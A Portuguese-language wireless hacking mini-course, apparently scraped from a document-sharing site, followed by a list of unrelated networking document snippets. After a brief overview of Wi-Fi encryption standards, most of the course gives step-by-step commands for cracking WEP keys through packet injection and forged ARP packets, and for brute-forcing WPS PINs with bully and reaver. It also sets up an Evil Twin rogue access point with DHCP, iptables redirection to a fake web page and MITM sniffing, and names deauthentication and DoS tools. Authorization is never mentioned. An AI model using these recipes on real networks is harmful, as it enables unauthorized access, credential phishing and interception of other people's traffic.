Mini-curso Vulnerabilidades em Redes Wireless
|
|
|
- Vitorino Lameira Cerveira
- 9 Há anos
- Visualizações:
Transcrição
1 Mini-curso Vulnerabilidades em Redes Wireless Junho 2015 Guilherme Junqueira Solyd - CaveiraTech
2 1. Introdução à criptografia em redes sem fio Você está todo feliz, pois acaba de comprar o seu roteador WiFi e finalmente vai poder compartilhar sua internet pela casa toda, para usar em seu vídeo game, celular, notebook e qualquer outro dispositivo. Quando receber os amigos em casa, todos vão poder subir fotos para o Facebook ou Instagram sem depender da conexão 3G. Mas, na hora de configurar, vem a dúvida: o que são todas aquelas siglas e protocolos de segurança? No momento de configurar a rede, você vai se deparar com os termos WEP, WPA e WPA2. Na ordem, estamos falando de padrões do mais antigo para o mais recente, e essa sequência história também é refletida em termos de segurança. Quanto mais novo o sistema, mais protegidos estarão os seus dados e conexão. Então, o que quer dizer cada sigla dessa sopa de letrinhas? WEP: Wired Equivalent Privacy O algoritmo de segurança que já foi o mais usado do mundo foi criado em 1999 e é compatível com praticamente todos os dispositivos WiFi disponíveis no mercado. Justamente por ser tão popular, é também o mais sujeito a falhas de segurança e o que possui mais buracos conhecidos. O padrão WEP se torna mais inseguro à medida que o poder de processamento dos computadores aumenta. Por ser um sistema de segurança de 128 bits (fator que define os caracteres possíveis, ou seja, o número máximo de combinações de senha), é possível descobrir a palavra-passe de uma rede WiFi desse tipo em poucos minutos por meio de um software de ataques. Oficialmente, o WEP não é considerado um padrão desde 2004, quando a Wi-Fi Alliance associação que certifica produtos sem fio e promove a tecnologia encerrou o suporte a ele. É altamente recomendado que você não use esse protocolo. WPA: Wi-Fi Protected Access Quando o WEP saiu de circulação, o WPA entrou em seu lugar como o protocolo-padrão da indústria. Adotado formalmente em 2003, a novidade trazia encriptação 256 bits e uma segurança muito maior para as redes. Além disso, sistemas de análise de pacotes para verificar alterações e invasões e outras ferramentas foram implementadas para melhorar a segurança. O problema aqui é que a arquitetura WPA foi produzida de forma a não tornar os dispositivos WEP obsoletos, e sim atualizáveis. Com isso, uma série de elementos do protocolo antigo foi reaproveitada e, com ela, diversos dos problemas do antecessor também acabaram presentes na nova versão. A descoberta de senhas por meio de processamento também é uma ameaça aqui, mas não acontece exatamente da mesma maneira que no antecessor. Em vez de usar a força bruta para descobrir senhas, os criminosos podem atingir sistemas suplementares, herdados do protocolo WEP, que servem para facilitar a configuração e conexão entre dispositivos antigos e modernos.
3 WPA2: Wi-Fi Protected Acces II O sistema-padrão atual e também o mais seguro, implementado pela Wi-Fi Alliance em A diferença aqui é a maneira como o sistema lida com senhas e algoritmos, excluindo completamente a possibilidade de um ataque de força bruta. Sendo assim, esse é o tipo mais seguro da atualidade. Segundo especialistas, o risco de intrusões para usuários domésticos com WPA2 é praticamente zero. Isso se deve a duas outras siglas incompreensíveis. O AES (Advanced Encryption Standard), um novo padrão para a segurança das informações, e o CCMP (Counter Cipher Mode), um mecanismo de encriptação que protege os dados que passam pela rede. Uma das poucas vulnerabilidades conhecidas atinge diretamente usuários corporativos e exige que o atacante possua acesso normal à rede sem fio. Uma vez conectado, o hacker poderia assumir o controle de outros dispositivos ligados à rede, incluindo dados contidos neles ou transferidos a partir das máquinas. Mais uma vez, isso se deve a programações de compatibilidade para ligação de roteadores antigos e modernos.
4 2. Endereço MAC O Endereço MAC (Media Access Control) é um endereço físico associado à interface de comunicação, que conecta um dispositivo à rede. O MAC é um endereço único, não havendo duas portas com a mesma numeração, e usado para controle de acesso em redes de computadores. Sua identificação é gravada em hardware, isto é, na memória ROM da placa de rede de equipamentos como desktops, notebooks, roteadores, smartphones, tablets, impressoras de rede, etc Controlando o Endereço MAC Sistema Linux Mudando seu MAC Address: wlan0 down #macchanger r wlan0 wlan0 up //Desliga a placa de rede //Muda o MAC para um endereço randômico //Liga a placa de rede Sistema Windows Utilizar programa TMACv6. Várias restrições são encontradas. Uso não recomendado. 3. Quebrando a criptografia WEP 3.1. Método 1 Com clientes conectados Caso seja necessário faça o MAC Spoofing
5 Monitorando uma rede especifica e gravando logs #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Arrumando BUG: fixed channel: -1 Parar o monitoramento anterior Desligar o dispositivo wlan0 wlan0 down Para contornar o bug fixed channel: -1 também pode ser utilizado o parâmetro --ignororenegative-one na frente dos comandos. Reiniciar o monitoramento #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Fazendo Handshake #aireplay-ng -1 0 a <bssid_atacado> -e <essid_atacado> mon0 Injetando Pacotes #aireplay-ng -3 b <bssid_atacado> mon0 Crackeando a senha #aircrack-ng <nome_do_arquivo_de_log>-01.cap Só esperar e ser feliz com sua senha Não se esqueça de reativar a interface wlan0 e de desativar a interface mon0 wlan0 up #airmon-ng stop mon0 Lembrando que este método precisa que haja clientes conectados à rede e que estes façam trocas de pacotes ARP, caso não haja clientes e nem trocas de pacotes ARP, use o método 2 de ataque Método 2 Sem clientes Para que este método funcione não poderá haver clientes conectados à rede. Iremos forjar um pacote ARP e replicá-lo na rede. Caso seja necessário faça o MAC Spoofing Monitorando uma rede especifica e gravando logs #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Fazendo Handshake (Falsa autenticação) #aireplay-ng -1 0 a <bssid_atacado> -e <essid_atacado> mon0
6 Fazendo Chopchop para obter PGRA #aireplay-ng -5 -b <bsssid> mon0 Forjando o pacote ARP através do PGRA criado #packetforge-ng -0 -a <bssid_atacado> -h <MAC da placa atacante> -k l y <arquivo criado com o chopchop.xor> -w arp-request Injetando pacotes ARP forjados aireplay-ng -2 -r arp-request ath0 Crackeando a senha #aircrack-ng <nome_do_arquivo_de_log>-01.cap Alternativamente pode ser utilizado um comando que substitui todas as etapas anteriores mas pode ser mais demorado. Método p0841 # aireplay-ng -2 -p c FF:FF:FF:FF:FF:FF -b <bssid atacado> -h <MAC da placa atacante> mon0 4. Buscando redes WPA com WPS Comando wash #wash i mon0 Busque por redes que tenha NO no WPS Locked. 5. Quebrando redes WPA/WPA2 com WPS Caso seja necessário faça o MAC Spoofing Crackeando a senha com Bully #bully b <bssid> -c <canal> mon0 Seja feliz com sua senha! Hehehe. Obs.: Forçando um PIN: #bully b <bssid> -c <canal> -p <pin_inicial> -B --force mon0
7 6. Quebrando redes WPS com Pixel Dust Fazendo update no Reaver #apt-get update #apt-get install reaver Caso seja necessário faça o MAC Spoofing Crackeando a senha com Bully #reaver b <bssid> -c <canal> -K 1 -i mon0 7. TwinEvil Ataque Passar a Rede para modo Bridge na VM Ativar modo monitor #airmon-ng start wlan0 Download OUI File (Arquivo com fabricantes de roteadores) - Opcional #airodump-ng-oui-update Rastreando conexões #airodump-ng M mon0 Criando o falso AP #airbase e <nome_da_rede_falsa> -c <canal> -P mon0 Configurar IP em at0 at0 up at /24 Adicionar Routing Table #route add -net netmask gw Instalando Servidor DHCP #apt-get install dhcp3-server Configuran DHCP server #nano /etc/dhcpd.conf
8 Configure o arquivo dhcpd.conf: authoritative; default-lease-time 600; max-lease-time 7200; subnet netmask { option subnet-mask ; option broadcast-address ; option routers ; option domain-name-servers ; range ; } Iniciar servidor DHCP #dhcpd cf /etc/dhcpd.conf pf /var/run/dhcpd.pid at0 #/etc/init.d/isc-dhcp-server start Habilitar IP Fowarding #echo 1 > /proc/sys/net/ipv4/ip_foward Pegar IP local #ip route Configure o IPTables de acordo com o ataque desejado Ataque 1 - Evil Twin: #iptables --flush #iptables --table nat --flush #iptables --delete-chain #ptables --table nat --delete-chain #iptables --table nat --append POSTROUTNG --out-interface eth0 j MARQUERADE #iptables --append FORWARD --in-interface at0 j ACCEPT #iptables t nat A PREROUTING p tcp --dport 80 j DNAT --to-destination <ip local>:80 #iptables t nat A POSTROUTING j MASQUERADE Ativar servidor apache e mysql #service apache2 start #service mysql start Configurar a página web na pasta: #cd /var/www/ Ataque 2 - MITM Rogue AP #iptables --flush #iptables --table nat --flush #iptables --delete-chain #iptables --table nat --delete-chain #iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE #iptables --append FORWARD --in-interface at0 -j ACCEPT
9 Para ler os pacotes no ataque MITM basta utilizar o Wireshark ou outra ferramenta para monitorar a interface at0 8. Ataques DoS Para efetuar ataques DoS, utilize a ferramenta: #mdk3 Para ataques de desautenticação, pode ser utilizado a ferramenta: #aireplay-ng 9. Referências Solyd Tecnologia em Servidores e Segurança da Informação Canal Caveiratech: Fórum CaveiraTech Documentação Aircrack:
Configuração do Servidor Gateway Firewall e DHCP
Fundamentos e Serviços IP Configuração do Servidor Gateway Firewall e DHCP Configurações da primeira placa de rede(que está conectada com a internet) receberá configurações do dhcp de sua rede. Configurações
Análise de Redes Wireless Suíte Aircrack-ng
Análise de Redes Wireless Suíte Aircrack-ng de_jah 28 de março de 201628 de março de 2016 Deixe um comentário Em tempos onde praticamente qualquer estabelecimento comercial ou residencial possui sua própria
Tem um Raspberry Pi 3? Saiba como transformá-lo num AP Wifi
Tem um Raspberry Pi 3? Saiba como transformá-lo num AP Wifi Date : 11 de Julho de 2016 O Raspberry Pi 3 pode ser usado para os mais diversos projectos/serviços. Esta nova versão do mini PC mais popular
Redes. Informações e exploits de todos os assuntos relacionados a redes. Não confundir com web! Wi-Fi. Introdução. Crackeando WPA/WPA2.
Redes Informações e exploits de todos os assuntos relacionados a redes. Não confundir com web! Wi-Fi Introdução Crackeando WPA/WPA2 Crackeando WEP Wi-Fi Wi-Fi Introdução Requisitos Para começar a hackear
Ponto de Acesso Sem Fio
Ponto de Acesso Sem Fio Guia do Usuário Versão: 1.1.0 Obrigado por escolher o Ponto de Acesso (AP) sem fio 54M. Como um produto rentável, este Ponto de Acesso sem fio fornece solução dedicada para pequenos
Sumário. Introdução... 15. 1 Fundamentos e Conceitos das Redes Sem Fio... 17. 2 Autenticação e Criptografia em uma Rede Wi-Fi.. 31
Sumário Introdução... 15 1 Fundamentos e Conceitos das Redes Sem Fio... 17 1.1 Padronização do Wi-Fi... 18 1.1.1 Spread Spectrum... 19 1.1.1.1 Frequency Hopping Spread Spectrum (FHSS)... 19 1.1.1.2 Direct-Sequence
Redes sem Fio Segurança em WLANs (802.11) Parte 02. Ricardo Kléber. Ricardo Kléber
Redes sem Fio 2016.1 Segurança em WLANs (802.11) Parte 02 Curso Superior de Tecnologia em Sistemas para Internet Turma: TEC.SIS.5M Objetivo da atividade prática Monitoramento (grampo) e captura de pacotes
Redes Sem Fio. Alberto Felipe Friderichs Barros https://albertofelipeblog.wordpress.com
Redes Sem Fio Alberto Felipe Friderichs Barros [email protected] https://albertofelipeblog.wordpress.com Introdução Uma rede sem fio é uma infraestrutura das comunicações sem fio que permite a
WIRELESS (WI-FI) REDES E SR1 ETER-FAETEC. Rio de Janeiro - RJ ETER-FAETEC
WIRELESS (WI-FI) REDES E SR1 Rio de Janeiro - RJ INTRODUÇÃO O termo wireless significa sem fio. Toda tecnologia de transmissão de dados que tem como característica a ausência de fios e cabos na transmissão
Laboratório 2. Configurando o Serviço DHCP
Neste laboratório iremos falar sobre o serviço DHCP (Dynamic Host configuration Protocol). O DHCP faz com que as máquinas clientes da rede recebam os endereços IP, máscara de subrede, gateway, servidores
Procedimentos para configuração do DWL-G700AP em modo Access Point
1 Procedimentos para configuração do DWL-G700AP em modo Access Point No modo Access Point o DWL-G700AP se conecta a várias máquinas, sejam elas notebooks ou desktops com adaptador wireless. Nesse Manual
Instalação e Configuração do Servidor de DHCP
Instalação e Configuração do Servidor de DHCP Passo Nº 1 Primeiramente vamos abrir um terminal de comando ou console como administrador, na tela principal da sua área de trabalho,, considerando que foi
Configuração sem fio em RV180W
Configuração sem fio em RV180W Objetivo Com o utilitário de configuração da Web, um usuário pode mudar vários ajustes sem fio no RV180W de modo que o roteador seja executado em seu desempenho ideal. Este
Dtec - Ubuntu Desktop 9.04 para Thin Clients Versão 1 APRESENTAÇÃO
1 APRESENTAÇÃO Este tutorial tem como objetivo principal divulgar de maneira rápida, prática e didática a instalação de uma pequena rede de computadores do tipo Thin Clients ligadas a um Servidor Ubuntu
Ataques ao Wi-Fi. Prof. Marcos Monteiro
Ataques ao Wi-Fi http://www.marcosmonteiro.com.br Prof. Marcos Monteiro Segurança e Ataques em redes WIFI Para garantir a segurança de uma rede Wifi precisamos resolver uma série de complicações que não
Redes sem fio IEEE Prof. Dr. Ruy de Oliveira IFMT
Redes sem fio IEEE 802.11 Prof. Dr. Ruy de Oliveira IFMT Operação Básica do Modo Infraestrutura Ponto de acesso (AP) e estação móvel (STA) O AP usa várias frequências de rádio (denominada canais) para
Introdução aos testes de segurança em redes sem fio com Aircrack-NG
Introdução aos testes de segurança em redes sem fio com Aircrack-NG O Aircrack-NG é conjunto de ferramentas para avaliar a segurança de redes sem fio. Ele foca em diferentes áreas da segurança do WiFi:
Engenharia de Segurança (SSC -0747)
Engenharia de Segurança (SSC -0747) São Carlos, 24 de Março de 1010 Prática 1 Cracking 1. Introdução Nesta prática introduziremos o conceito de cracking através de vulnerabilidades do padrão 802.11a/b/g/n.
Administração dos serviços de redes utilizando linux
Administração dos serviços de redes utilizando linux Joao Medeiros [email protected] Objetivo Apresentar uma visão geral sobre os principais serviços de redes e a instalação e configuração de um servidor
Procedimentos para configuração em modo WDS with AP
Procedimentos para configuração em modo WDS with AP 1- No modo WDS with AP, o DAP-1353 se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System)
Redes de Computadores
Redes de Computadores Aula 13 Segurança de Redes Sem Fio Prof. Ricardo M. Marcacini [email protected] Curso: Sistemas de Informação 1º Semestre / 2015 http://moodle.lives.net.br/ Elementos de uma
Procedimentos para configuração em modo WDS with AP
Procedimentos para configuração em modo WDS with AP 1- No modo WDS with AP, o DAP-1353 se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System)
Redes Domésticas. Adrian C. Ferreira 07/08/2017
Redes Domésticas Adrian C. Ferreira 07/08/2017 Roteiro Nossa Conexão (Brasil) O que é uma rede doméstica Redes Locais - LAN Home Area Network - HAN Tecnologias Ethernet e Wifi WiFi x Wired Contratação
Manual do Usuário OIW-2442EX b/g/n 300Mbps Wireless Extender Versão 1.0 Última atualização Janeiro de 2015.
Manual do Usuário OIW-2442EX 802.11b/g/n 300Mbps Wireless Extender Versão 1.0 Última atualização Janeiro de 2015. 1 Introdução Obrigado por adquirir o OIW-2442 802.11b/g/n 300Mbps Wireless Extender. Esse
Modem ADSL. Resumo de Configurações
Modem ADSL Resumo de Configurações Introdução ADSL: Linha digital assimétrica. Assimetria: velocidade de download diferente da velocidade de upload. Exemplo: Ao contratar um plano ADSL Velox apelidado
Configuração do Evo-W54ARv2 em modo AP
Configuração do Evo-W54ARv2 em modo AP Para começar com a configuração do EVO-W54ARv2 conectaremos um cabo de rede desde a porta 1 do EVO-W54ARv2 até a placa de rede de seu equipamento. Agora começaremos
Procedimentos para configuração do DWL-G700AP em modo Repeater
Procedimentos para configuração do DWL-G700AP em modo Repeater No modo * Repeater o DWL-G700AP vai repetir o sinal Wireless do DI-524. * O DWL-G700AP somente apresenta a função Repeater a partir da versão
Índice. Introdução...3
Índice Introdução...3 1.1 Observações...3 1.2 Recursos...3 1.3 Especificações...4 2. Instalação...4 2.1 LED Indicador...5 2.2.1 Instalações e configuração do Driver...5 2.3 Configurações das propriedades
Configuração do bridge de grupo de trabalho nos Access point WAP551 e WAP561
Configuração do bridge de grupo de trabalho nos Access point WAP551 e WAP561 Objetivo Este artigo explica como configurar o bridge de grupo de trabalho nos Access point WAP551 e WAP561. A característica
Segurança em Redes e Sistemas Operacionais
Segurança em Redes e Sistemas Operacionais Segurança - [email protected] 1 Agenda Preparação do Ambiente Como é o Ambiente em que vamos trabalhar? Visão Macro Passos... Segurança - [email protected]
Rede Wireless da FEUP
Rede Wireless da FEUP Fernando Romão Faculdade de Engenharia da Universidade do Porto 1 Serviços do CICA Servidores de Desenvolvimento Serviços de rede Salas de informática Apoio ao utilizador Segurança
LUIS GUILHERME MACHADO CAMARGO PEDRO ALBERTO DE BORBA RICARDO FARAH STEFAN CAMPANA FUCHS TELMO FRIESEN MAPEAMENTO DE AMBIENTES COM O ROBÔ BELLATOR
UNIVERSIDADE TECNOLÓGICA FEDERAL DO PARANÁ DEPARTAMENTO ACADÊMICO DE ELETRÔNICA DEPARTAMENTO ACADÊMICO DE INFORMÁTICA CURSO DE ENGENHARIA DE COMPUTAÇÃO LUIS GUILHERME MACHADO CAMARGO PEDRO ALBERTO DE BORBA
Roteador Wireless de 1800 ISR com exemplo de configuração interno DHCP e de autenticação aberta
Roteador Wireless de 1800 ISR com exemplo de configuração interno DHCP e de autenticação aberta Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Convenções Configurar Diagrama de Rede
Atualizando sua Smart TV. Via Pen Drive. Conectando sua Smart TV. Rede Wi-Fi. Conectando sua Smart TV. Via Cabo. 04 Dúvidas? Perguntas Frequentes
01 02 03 Atualizando sua Smart TV Via Pen Drive Rede Wi-Fi Via Cabo 04 Dúvidas? Perguntas Frequentes 01 Atualizando sua Smart TV Via Pen Drive Etapa 1 - Separe um Pen Drive vazio para o processo. Etapa
Configuração do Evo-W54ARv2 em modo Cliente
Configuração do Evo-W54ARv2 em modo Cliente Para começar com a configuração do EVO-W54ARv2 conectaremos um cabo de rede desde a porta 1 do EVO-W54ARv2 até a placa de rede de seu equipamento. Agora começaremos
WEP, WPA e EAP. Rodrigo R. Paim
WEP, WPA e EAP Rodrigo R. Paim Agenda Redes sem Fio e Segurança Wired Equivalent Privacy Wi-Fi Protected Access Extensible Authentication Protocol Conclusão Redes sem Fio e Segurança Wired Equivalent Privacy
Configurar ajustes da segurança Wireless em um WAP
Configurar ajustes da segurança Wireless em um WAP Introdução Configurar a segurança Wireless em seu ponto de acesso Wireless (WAP) é alto-essencial proteger sua rede Wireless dos intrusos que podem comprometer
MANUAL DO USUARIO NX WIFI
O NXWiFi é um conversor de Serial e Ethernet para WiFi, com isso eliminando o cabeamento em algumas instalações e deixando alguns equipamentos com mais mobilidade. Manual NXWiFi Existem dois modos de utilização
Configurando Interface de Rede. IPTABLES Firewall em Linux Kernel 2.4 em diante. Regras do Iptables. Iptables. Regras do Iptables. Comandos Principais
IPTABLES Firewall em Linux Kernel 2.4 em diante Prof. Alexandre Beletti Ferreira Configurando Interface de Rede Configuração da interface de rede: netconfig (Slackware) netconf ou linuxconf (Conectiva
Aula 2 DHCP. (Dinamic Host Configuration Protocol) Servidor DHCP. Prof. Roitier Campos Gonçalves
Aula 2 DHCP (Dinamic Host Configuration Protocol) Servidor DHCP Prof. Roitier Campos Gonçalves Objetivos Entender o protocolo DHCP; Entender os métodos de atribuição de endereços; Configurar um servidor
Atacando redes wifi com Aircrack-ng protegidas com criptografia WPA e WPA2. Wi-Fi Protected Access (WAP)
Atacando redes wifi com Aircrack-ng protegidas com criptografia WPA e WPA2 Vimos na postagem anterior como a criptografia WEP é fraca e podemos quebrar a criptografia, obtendo a chave de proteção com o
III WTR do POP-BA III Workshop de Tecnologias de Redes Ponto de Presença da RNP na Bahia Instrutor: Ibirisol Fontes Monitor: Jundaí Abdon.
III WTR do POP-BA III Workshop de Tecnologias de Redes Ponto de Presença da RNP na Bahia Instrutor: Ibirisol Fontes Monitor: Jundaí Abdon Prática 1 Cenário: Na figura acima temos uma pequena rede, que
Guia de Configurações do Wi-Fi
Guia de Configurações do Wi-Fi Conexões Wi-Fi com a Impressora Como conectar a um computador por meio de um roteador Wi-Fi Como conectar diretamente a um computador Como conectar a um dispositivo inteligente
Procedimentos para configuração do DWL-2100AP em modo Repeater
Procedimentos para configuração do DWL-2100AP em modo Repeater No modo Repeater o DWL-2100AP vai repetir o sinal do DI-624 pela rede Wireless. Neste manual vamos apresentar a seguinte topologia: A posição
Introdução a Sistemas Abertos Configuração de Rede
Introdução a Sistemas Abertos Configuração de Rede [email protected] Interfaces de Rede As placas de rede, geralmente, são reconhecidas dinamicamente pelo sistema. As interfaces são localizadas
Disciplina: Fundamentos de serviços IP Alunos: Estevão Elias Barbosa Lopes e Leonardo de Azevedo Barbosa
Disciplina: Fundamentos de serviços IP Alunos: Estevão Elias Barbosa Lopes e Leonardo de Azevedo Barbosa DHCP: Dynamic Host Configuration Protocol (Protocolo de configuração dinâmica de host), é um protocolo
DHCP. Administração de Redes de Computadores Prof.ª Juliana Camilo 6080822 Ângelo, Bryan, Carlos, Vinícius
DHCP Administração de Redes de Computadores Prof.ª Juliana Camilo 6080822 Ângelo, Bryan, Carlos, Vinícius Histórico O termo DHCP significa Dynamic Host Configuration Protocol Começou a se tornar popular
PROJETO LÓGICO DE REDE
Instituto Federal de Santa Catarina Campus Lages Curso de Ciência da Computação Redes de Computadores Alberto Felipe Friderichs Barros Robson Costa Leonardo André de Oliveira Correa Lucas dos Anjos Varela
REDES DE COMPUTADORES
REDES DE COMPUTADORES Jonas Willian R Aureliano Resumo prático Professor: Jonas Willian ROTEIRO Arquivo sources.list; Comando apt-get; Arquivo hostname; Arquivo interfaces; ARQUIVO SOURCES.LIST Este é
INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS
INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS 1 Índice INSTALANDO O HYPER-V EM UM S.O. WINDOWS...3 Passo 1: Habilite a virtualização na BIOS do computador...3 Passo 2: Instalando o Hyper-V...3
Assistente de configuração em RV215W
Assistente de configuração em RV215W Objetivo O assistente de configuração permite que um administrador de rede configure as configurações básicas para o RV215W rapidamente e convenientemente. Este artigo
HTTP, SMTP, FTP, SSH, DNS,... Domínios: TCP, UDP. porta: :80, : Endereço de IP: IP, ICMP,...
Palestra 3-09/05 O que é o Wi-Fi? Domínios: www.google.com HTTP, SMTP, FTP, SSH, DNS,... porta: :80, :443... Endereço de IP: 103.204.80.23 TCP, UDP IP, ICMP,... Ethernet, 802.11 (Wi-Fi)... Propriedades
Preparação AV3 Fundamentos de Redes de Computadores
Preparação AV3 Fundamentos de Redes de Computadores 1 - Em uma rede de computadores existem dispositivos responsáveis por distribuir as informações por toda a rede. Quando falamos de dispositivos que atuam
Para realizar o procedimento de configuração de Bridge with AP, será necessário que os DAP-1360 estejam ligados ao computador por um cabo Ethernet.
1- No modo Bridge with AP, o DAP-1360 se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System) permite o acesso de um DAP-1360 com o outro DAP-1360
AP Router WR b+g Wireless Router. Manual Do Usuário
AP Router WR 252 802.11b+g Wireless Router 802.11g/802.11b Wireless Access Point Broadband Internet Access 2-Port Switching Hub Manual Do Usuário Índice CAPÍTULO 1: INTRODUÇÃO... 3 WR 252 Características...
Exemplo de Configuração de Wi-Fi Protected Access 2 (WPA 2)
Exemplo de Configuração de Wi-Fi Protected Access 2 (WPA 2) Índice Introdução Pré-requisitos Requisitos Componentes Usados Convenções Informações complementares Suporte a WPA 2 com Equipamentos Cisco Aironet
Procedimentos para configuração de WDS With AP
Procedimentos para configuração de WDS With AP No modo WDS with AP, o DWL-2100AP se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System) permite
Compartilhamento da internet, firewall
da internet, firewall João Medeiros ([email protected]) 1 / 29 Exemplo de transmissão 2 / 29 Exemplo de transmissão Dados trafegam em pacotes com até 1460 bytes de dados e dois headers de 20 bytes
W-R2000nL v1.3 Guia de instalação
W-R2000nL v1.3 Guia de instalação Sumário Instalação...3 Configurando seu computador...4 Acessando a tela de configurações...5 Configuração de Roteamento...6 Alterando senha da rede sem fio...11 Repetição
INSTALAÇÃO PRINTERTUX. Tutorial
INSTALAÇÃO PRINTERTUX Tutorial 2 1. Download 1 Efetue o download acessando o endereço: https://www.hesolucoes.com.br/iso/printertux-2.1.iso MD5SUM: 844d318e9672fdbffec0ad354b642d5b 2. Pré-Requisitos (Hardware)
RCO2. WLAN: Segurança e IEEE
RCO2 WLAN: Segurança e IEEE 802. Segurança: muitos problemas... Uso indevido da infraestrutura Equipamentos/usuários não autorizados Quebra de privacidade Tráfego monitorado Conteúdo trafegado revelado!
Daniel Moreno. Novatec
Daniel Moreno Novatec Novatec Editora Ltda. 2016. Todos os direitos reservados e protegidos pela Lei 9.610 de 19/02/1998. É proibida a reprodução desta obra, mesmo parcial, por qualquer processo, sem prévia
Cisco recomenda que você tem o conhecimento do CUCM e dos pontos de acesso da Cisco.
Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Configurar Configuração do ponto de acesso Como alcançar o Access Point (AP) Permita interfaces de rádio Adicionar o VLAN novo A criação
Tópicos Especiais em Informática
Tópicos Especiais em Informática DCHP Prof. Ms.-Eng. Igor Sousa Faculdade Lourenço Filho 5 de novembro de 2014 [email protected] (FLF) Tópicos Especiais em Informática 5 de novembro de 2014 1 / 14 Introdução
Guia Rápido Roteador RE041. quickguide_rv1.indd 1 21/09/ :42:40
Guia Rápido Roteador RE041 quickguide_rv1.indd 1 21/09/2012 14:42:40 quickguide_rv1.indd 2 21/09/2012 14:42:40 3 Sumário Sumário...3 1. Conectando o roteador...4 2. Login no roteador...6 3. Conectando
Como Instalar Nagios 4 E Monitorar Seus Servidores no Ubuntu 14 Introdução
Nagios e NRPE Como Instalar Nagios 4 E Monitorar Seus Servidores no Ubuntu 14 Introdução Neste tutorial, cobriremos a instalação do Nagios 4, um sistema de monitoramento de código livre muito popular,
GUIA DE INSTALAÇÃO RÁPIDA CÓD.:6810-6
GWR -130 Repetidor Wireless 300Mpbs GUIA DE INSTALAÇÃO RÁPIDA CÓD.:6810-6 Repetidor Wireless 300 Mbps GWR -130 Guia de Instalação Rápida REV.1.0 1. INTRODUÇÃO O Repetidor Wireless 300Mbps (2T2R), modelo
Prática NAT/Proxy. Edgard Jamhour. Esses exercícios devem ser executados através do servidor de máquinas virtuais: espec.ppgia.pucpr.
Prática NAT/Proxy Edgard Jamhour Exercícios práticos sobre NAT e Proxy, usando Linux. Esses exercícios devem ser executados através do servidor de máquinas virtuais:.ppgia.pucpr.br OBS. Esse roteiro utiliza
LABORATÓRIO IPV6.1. INTRODUÇÃO AO IPV6 Documento versão 0.1. Aluno: Paulo Henrique Moreira Gurgel #
LABORATÓRIO IPV6.1 INTRODUÇÃO AO IPV6 Documento versão 0.1 Aluno: Paulo Henrique Moreira Gurgel #5634135 Orientado pela Professora Kalinka Regina Lucas Jaquie Castelo Branco Maio / 2011 Laboratório 6.1
Projeto AirStrike: Um Sistema com Acesso Seguro e Gerenciamento Integrado para Redes sem Fio Baseadas no padrão 802.11
Projeto AirStrike: Um Sistema com Acesso Seguro e Gerenciamento Integrado para Redes sem Fio Baseadas no padrão 802.11 Airon Fonteles da Silva Bruno Astuto A. Nunes Luciano R. de Albuquerque Sumário Aspectos
SAP Business One 8.8. How to Connect Mobile App to B1 Demo System
SAP Business One 8.8 How to Connect Mobile App to B1 Demo System Alexandre Castro Channel Enablement & Solution Expert SAP Business One Ecosystem & Channel Readiness SAP Brasil Março 2011 SAP Business
Configuração de Rede Wireless com Segurança no Evo-W108AR
Configuração de Rede Wireless com Segurança no Evo-W108AR Este manual vai orientá-lo a configurar a rede wireless (sem fio) no Evo-W108AR e a configurar a segurança da rede. 1 Abra o navegador (Internet
Guia para Acesso Remoto
Termostato Web Controlador de Temperatura com Acesso Remoto Modelos CTR-101 e CTR-102 Guia para Acesso Remoto Versão 1.0 Julho/2016 1 1- Descrição O Termostato Web é um controlador digital de temperatura
Instalação e Configuração Iptables ( Firewall)
Instalação e Configuração Iptables ( Firewall) Pág - 1 Instalação e Configuração Iptables - Firewall Desde o primeiro tutorial da sequencia dos passo a passo, aprendemos a configurar duas placas de rede,
Minicurso. Análise de Redes usando Wireshark
Minicurso Análise de Redes usando Wireshark Apresentação Tadeu Ferreira Oliveira Professor do IFRN SGA Graduado em Computação Msc. Em Sistemas de computação na área de redes em chip (Noc) Ex-coordenador
Serviços de Redes. Aula 03 - Servidor DHCP
Serviços de Redes Aula 03 - Servidor DHCP Instituto Federal Catarinense Campus Sombrio Curso: Tecnologia em Redes de Computadores Professor: Jéferson Mendonça de Limas Por que Utilizar um Servidor DHCP
Manual de Configuração.
O NX WiFi é um conversor de Serial e Ethernet para WiFi, com isso eliminando o cabeamento em suas instalações e deixando-os equipamentos com mais mobilidade. NX WiFi Modo STA Modo STA Neste modo o NXWiFi
Utilizando IP na iluminação Cênica
Utilizando IP na iluminação Cênica (Conectando software DOT2 on PC e interface LUMIKIT) Por Marco Gonçalves IP (Internet Protocol) O que é IP (Internet Protocol) ou o Protocolo da Internet, a máscara de
Configuração do Evo-W54ARv2 em modo Repetidor WDS
Configuração do Evo-W54ARv2 em modo Repetidor WDS Para realizar a função de repetidor de nosso ponto de acesso necessitaremos de 2 ou mais equipamentos Wireless que suportem a função de WDS Repeater, sabendo
O Servidor de impressão DP-300U atende a seguinte topologia: Podem ser conectadas 2 impressoras Paralelas e 1 USB.
O Servidor de impressão DP-300U atende a seguinte topologia: Podem ser conectadas 2 impressoras Paralelas e 1 USB. 1 1- Para realizar o procedimento de configuração o DP-300U deve ser conectado via cabo
Tecnologias e Componentes de Redes
Tecnologias e Componentes de Redes Material de apoio Redes sem fio Cap.13 19/01/2012 2 Esclarecimentos Esse material é de apoio para as aulas da disciplina e não substitui a leitura da bibliografia básica.
